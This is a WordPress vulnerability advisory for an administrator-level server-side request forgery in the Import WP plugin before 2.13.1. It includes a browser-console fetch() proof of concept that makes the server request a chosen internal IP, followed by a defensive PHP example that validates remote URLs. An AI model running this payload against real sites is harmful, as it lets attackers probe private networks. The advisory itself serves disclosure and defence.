Source: wpvulndb | Author: Mr Empy | WPVDB-ID: AEEFCC01-BBBF-4D86-9CFD-EA0F9A85E1A5
History: Apr 03, 2024 - 12:00 a.m.

Import WP < 2.13.1 - Admin+ Server-side Request Forgery

2024-04-03 00:00:00
Mr Empy
wpscan.com
7
wordpress plugin
ssrf vulnerability
administrator role
multisite configurations

AI Score: 6.8 Medium (Confidence: High)

EPSS: 0.0004 Low (Percentile: 9.0%)

Description: The plugin does not prevent users with the administrator role from making the server ping hosts of their choosing, i.e. conducting SSRF attacks, which may be a problem in multisite configurations.

PoC

1. As an admin, create a new importer in /wp-admin/tools.php?page=importwp
2. Visit /wp-admin/admin-ajax.php?action=rest-nonce and paste the following in your browser's console, replacing $IMPORTERID with the newly created importer's ID and $TARGETLOCALIP with the local IP to probe:

    fetch('/wp-json/iwp/v1/importer/$IMPORTERID/upload', {
      method: 'POST',
      headers: {
        'X-WP-Nonce': document.body.innerHTML,
        'Content-Type': 'application/x-www-form-urlencoded',
      },
      body: 'remote_url=http%3A%2F%2F$TARGETLOCALIP%2FSSRF_PoC&filetype=csv&action=file_remote',
      credentials: 'include'
    })
    .then(response => response.text())
    .then(data => console.log(data))
    .catch(error => console.error('Fetch error:', error));
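For comparison with the description and PoC above, here is an added example (not Import WP's own code, and not the fix the plugin shipped) of how a WordPress REST handler that fetches a user-supplied remote_url can refuse internal targets: it validates the URL with core's wp_http_validate_url() and fetches through wp_safe_remote_get(), which re-applies that check to redirect targets. The route, function names and the multisite capability policy in permission_callback are assumptions made for the example.

```php
<?php
// Added example (hypothetical route and function names); it is not the
// plugin's code. Demonstrates rejecting SSRF targets before fetching.
add_action( 'rest_api_init', function () {
    register_rest_route( 'example/v1', '/importer/(?P<id>\d+)/upload', array(
        'methods'             => 'POST',
        'callback'            => 'example_fetch_remote_file',
        // The REST API already verifies X-WP-Nonce; this adds a capability
        // gate. Assumption: on multisite, site admins are not trusted to
        // trigger server-side fetches, only network admins are.
        'permission_callback' => function () {
            return is_multisite()
                ? current_user_can( 'manage_network' )
                : current_user_can( 'manage_options' );
        },
    ) );
} );

function example_fetch_remote_file( WP_REST_Request $request ) {
    $url = (string) $request->get_param( 'remote_url' );

    // wp_http_validate_url() (WordPress core) rejects non-http(s) schemes,
    // unusual ports, and hosts that resolve to loopback or private ranges
    // (127.x, 10.x, 172.16-31.x, 192.168.x, 0.x) unless the
    // 'http_request_host_is_external' filter explicitly allows them.
    $safe_url = wp_http_validate_url( $url );
    if ( false === $safe_url ) {
        return new WP_Error( 'invalid_remote_url', 'Remote URL is not allowed.',
            array( 'status' => 400 ) );
    }

    // wp_safe_remote_get() sets reject_unsafe_urls, so redirect targets are
    // validated too; a 302 from an external host to 127.0.0.1 is refused.
    $response = wp_safe_remote_get( $safe_url,
        array( 'timeout' => 15, 'redirection' => 2 ) );

    // Return a generic error: echoing transport errors or response bodies
    // verbatim would tell a caller whether an internal host answered.
    if ( is_wp_error( $response )
        || 200 !== (int) wp_remote_retrieve_response_code( $response ) ) {
        return new WP_Error( 'fetch_failed', 'Could not fetch the remote file.',
            array( 'status' => 502 ) );
    }

    $body = wp_remote_retrieve_body( $response );
    return rest_ensure_response( array( 'bytes' => strlen( $body ) ) );
}
```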

CPE: Operator eq, Version 2.13.1

